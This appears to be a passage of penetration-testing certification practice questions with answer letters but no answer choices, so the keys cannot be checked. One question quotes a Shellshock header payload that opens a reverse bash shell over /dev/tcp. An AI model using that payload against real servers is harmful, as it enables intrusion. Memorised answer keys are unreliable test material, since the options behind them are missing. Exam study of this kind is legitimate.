Which of the following documents must be signed between the penetration tester and the client to govern how any provided information is managed before, during, and after the engagement?
Correct Answer:
B
Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?
Correct Answer:
A
A penetration tester is testing input validation on a search form that was discovered on a website. Which of the following characters is the BEST option to test the website for vulnerabilities?
Correct Answer:
C
Which of the following situations would require a penetration tester to notify the emergency contact for the engagement?
Correct Answer:
D
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& /dev/tcp/127.0.0.1/9090 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
Correct Answer:
A